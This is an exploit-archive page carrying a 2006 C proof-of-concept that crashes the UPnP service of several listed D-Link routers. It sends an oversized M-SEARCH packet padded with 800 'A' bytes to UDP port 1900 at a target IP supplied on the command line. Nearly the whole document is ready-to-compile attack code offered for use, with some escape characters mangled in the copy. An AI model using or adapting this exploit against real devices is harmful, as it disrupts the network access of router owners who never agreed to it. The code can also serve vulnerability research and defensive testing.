[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)
# Published : 2006-07-22
# Author : ub3rst4r
# Previous Title : libmikmod <= 3.2.2 (GT2 loader) Local Heap Overflow PoC
# Next Title : Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
/* routers affected from eEye's advisory. /str0ke
Routers Affected:
DI-524 Rev A
DI-524 Rev C
DI-524 Rev D
DI-604 Rev E
DI-624 Rev C
DI-624 Rev D
DI-784 Rev A
EBR-2310 Rev A
WBR-1310 Rev A
WBR-2310 Rev A
*/
/*
* D-Link Router UPNP DOS PoC
* Written By: ub3rst4r aka DiGiTALST*R
* Tested Against: DI-524 Rev. A
*
* A remote stack overflow exists in a range of wired and wireless D-Link
* routers. This vulnerability allows an attacker to execute privileged code
* on an affected device. Although a stack overflow does exist, debugging this
* vulnerabilty requires additional external hardware.
*
* NOTE: You might need to try sending this twice, or use 239.255.255.250
*
* Credits: eEye Digital Security
*
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char **argv)
{
WSADATA wsa;
char buf[896];
int sockfd;
struct sockaddr_in serv_addr;
int ret;
if (argc < 2) {
printf("Usage: dlinkdos <router ip>n");
return 0;
}
WSAStartup(MAKEWORD(1,1), &wsa);
// the main string
memcpy(buf, "M-SEARCH ", 9);
memset(buf+9, 'A', 800);
memcpy(buf+809, " HTTP/1.1rn", 10);
// extra data
strcat(buf,
"Host:239.255.255.250:1900rn"
"ST:upnp:rootdevicern"
"Man:"ssdp:discover"rn"
"MX:3rn"
"rn"
"rn");
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(1900);
serv_addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&serv_addr.sin_zero, '�', 8);
ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr));
if (ret <= 0) {
printf("failed to send requestn");
return 0;
}
printf("request sent!n");
WSACleanup();
return 0;
}
// www.Syue.com [2006-07-22]